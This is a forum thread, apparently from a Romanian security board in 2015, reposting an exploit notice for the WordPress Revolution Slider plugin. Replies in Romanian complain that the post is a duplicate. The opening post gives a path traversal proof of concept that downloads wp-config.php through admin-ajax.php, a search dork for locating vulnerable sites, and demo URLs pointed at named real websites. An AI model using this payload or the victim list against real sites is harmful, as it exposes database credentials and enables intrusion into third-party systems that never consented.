Aerosol Posted January 27, 2015 Report Posted January 27, 2015 [+] Title: Wordpress slider reolusion local file download[+] Date: 2015-01-25[+] Author: JOK3R[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/[+] Tested on: windows 7 / firefox , kali linux / firefox[+] Vulnerable Files: /plugins/revolution-slider/[+} Dork : "Index of" /wp-content/plugins/revolution-slider/### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php### Demo: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.phphttp://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.phphttp://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php### Credits:[+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*And All iranian Hacker's And Exploiter's <3[+] iran-cyber.inSource Quote
Kalashnikov. Posted January 27, 2015 Report Posted January 27, 2015 https://rstforums.com/forum/94729-wordpress-revslider-local-file-disclosure.rst?highlight=revslider???? nu mai ai ce sa copiezi si ai inceput sa faci posturi duplicate? Quote
Aerosol Posted January 27, 2015 Author Report Posted January 27, 2015 [+] Title: Wordpress slider reolusion local file download[+] Date: 2015-01-25[+] Author: JOK3R[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/[+] Tested on: windows 7 / firefox , kali linux / firefox[+] Vulnerable Files: /plugins/revolution-slider/[+} Dork : "Index of" /wp-content/plugins/revolution-slider/& # Exploit Title: [Wordpress RevSlider Plugin LFD]# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image# Date: 12/29/14# Exploit Author: FarbodEZRaeL# Vendor Homepage: iranhack.org# Software Link: wordpress.org# Tested on: windows Vezi de treaba. Quote
Kalashnikov. Posted January 27, 2015 Report Posted January 27, 2015 & Vezi de treaba.e accelasi cacat, de ce il pui de 2 ori ? + Quote
Bit-ul Posted January 27, 2015 Report Posted January 27, 2015 e accelasi cacat, de ce il pui de 2 ori ? +Arata altfel codul si nu s-a prins Quote
Gio33 Posted January 27, 2015 Report Posted January 27, 2015 https://rstforums.com/forum/89150-revslider-4-6-security-vulnerability.rst?highlight=revsliderMhm .. 09/2014admin-ajax.php?action=revslider_show_imagevsadmin-ajax.php?action=revolution-slider_show_imageSame shit. Quote
